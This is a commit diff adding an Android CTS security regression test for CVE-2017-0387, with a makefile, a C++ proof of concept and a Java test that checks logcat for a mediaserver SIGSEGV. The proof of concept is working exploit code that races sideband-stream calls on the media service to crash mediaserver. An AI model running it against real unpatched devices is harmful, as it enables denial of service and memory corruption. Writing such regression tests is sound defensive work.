[automerger] RESTRICT AUTOMERGE: CTS test for Android Security b/32660278 am: c8fa272c1d am: 31937ce81c am: 80f770a7d2
Change-Id: Ia98c9eb7cf7061202148b6545edf97e2ff8ce043
diff --git a/hostsidetests/security/AndroidTest.xml b/hostsidetests/security/AndroidTest.xml
index 50c7728..758da6c 100644
--- a/hostsidetests/security/AndroidTest.xml
+++ b/hostsidetests/security/AndroidTest.xml
@@ -39,6 +39,7 @@
<!--__________________-->
<!-- Bulletin 2017-01 -->
<!-- Please add tests solely from this bulletin below to avoid merge conflict -->
+ <option name="push" value="CVE-2017-0387->/data/local/tmp/CVE-2017-0387" />
<!--__________________-->
diff --git a/hostsidetests/security/securityPatch/CVE-2017-0387/Android.mk b/hostsidetests/security/securityPatch/CVE-2017-0387/Android.mk
new file mode 100644
index 0000000..3684333
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2017-0387/Android.mk
@@ -0,0 +1,40 @@
+# Copyright (C) 2018 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+LOCAL_MODULE := CVE-2017-0387
+LOCAL_SRC_FILES := poc.cpp
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+LOCAL_SHARED_LIBRARIES := libmedia libutils libcutils libbinder
+LOCAL_C_INCLUDES:= \
+ $(TOP)/frameworks/native/include/media/openmax \
+ $(TOP)/frameworks/av/media/libstagefright/omx
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+LOCAL_CPPFLAGS += -Wall -Werror -W -g -O2 -Wimplicit -D_FORTIFY_SOURCE=2 -D__linux__ -Wdeclaration-after-statement
+LOCAL_CPPFLAGS += -Wformat=2 -Winit-self -Wnested-externs -Wpacked -Wswitch-enum -Wundef
+LOCAL_CPPFLAGS += -Wwrite-strings -Wno-format-nonliteral -Wstrict-prototypes -Wmissing-prototypes
+LOCAL_CPPFLAGS += -Wno-unused-parameter -Wno-unused-variable -Wno-macro-redefined
+LOCAL_CPPFLAGS += -Iinclude -fPIE
+LOCAL_LDFLAGS += -fPIE -pie
+LOCAL_LDFLAGS += -rdynamic
+include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/security/securityPatch/CVE-2017-0387/poc.cpp b/hostsidetests/security/securityPatch/CVE-2017-0387/poc.cpp
new file mode 100644
index 0000000..5d21d93
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2017-0387/poc.cpp
@@ -0,0 +1,71 @@
+/*
+ * Copyright (C) 2018 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#include <binder/IPCThreadState.h>
+#include <binder/IServiceManager.h>
+#include <binder/Parcel.h>
+#include <binder/ProcessState.h>
+#include <binder/TextOutput.h>
+#include <cutils/ashmem.h>
+#include <cutils/native_handle.h>
+#include <dlfcn.h>
+#include <fcntl.h>
+#include <jni.h>
+#include <media/IMediaPlayerService.h>
+#include <media/IOMX.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <sys/mman.h>
+#include <sys/stat.h>
+#include <sys/types.h>
+#include <utils/NativeHandle.h>
+using namespace android;
+struct MyObserver : public BnOMXObserver {
+ virtual void onMessages(const std::list<omx_message> &messages) {}
+};
+
+static void *start(void *args) {
+ sp<IGraphicBufferConsumer> bufferConsumer =
+ *(sp<IGraphicBufferConsumer> *)args;
+ while (1) {
+ sp<NativeHandle> stream = bufferConsumer->getSidebandStream();
+ }
+ return NULL;
+}
+int main(__attribute__((unused)) int argc,
+ __attribute__((unused)) char *const argv[]) {
+ sp<IServiceManager> sm = defaultServiceManager();
+ sp<IBinder> binder = sm->getService(String16("media.player"));
+ sp<IMediaPlayerService> service = interface_cast<IMediaPlayerService>(binder);
+ sp<IOMX> omx = service->getOMX();
+ sp<IGraphicBufferProducer> bufferProducer = NULL;
+ sp<IGraphicBufferConsumer> bufferConsumer = NULL;
+ status_t status =
+ omx->createPersistentInputSurface(&bufferProducer, &bufferConsumer);
+ if (status != OK) {
+ return -1;
+ }
+
+ pthread_t thread;
+ pthread_create(&thread, NULL, start, &bufferConsumer);
+
+ native_handle_t *nativeHandle = native_handle_create(0, 20);
+ sp<NativeHandle> nh = NativeHandle::create(nativeHandle, true);
+ while (1) {
+ bufferProducer->setSidebandStream(nh);
+ }
+ pthread_join(thread, NULL);
+ return 0;
+}
diff --git a/hostsidetests/security/src/android/security/cts/Poc17_01.java b/hostsidetests/security/src/android/security/cts/Poc17_01.java
index 934cacd..4b878bc 100644
--- a/hostsidetests/security/src/android/security/cts/Poc17_01.java
+++ b/hostsidetests/security/src/android/security/cts/Poc17_01.java
@@ -30,4 +30,17 @@
AdbUtils.runPoc("CVE-2016-8482", getDevice(), 60);
}
}
+
+ /**
+ * b/34749392
+ */
+ @SecurityTest
+ public void testPocCVE_2017_0387() throws Exception {
+ AdbUtils.runCommandLine("logcat -c" , getDevice());
+ AdbUtils.runPocNoOutput("CVE-2017-0387", getDevice(), 60);
+ String logcatOut = AdbUtils.runCommandLine("logcat -d", getDevice());
+ assertNotMatches("[\\s\\n\\S]*Fatal signal 11 \\(SIGSEGV\\)" +
+ "[\\s\\n\\S]*>>> /system/bin/" +
+ "mediaserver <<<[\\s\\n\\S]*", logcatOut);
+ }
}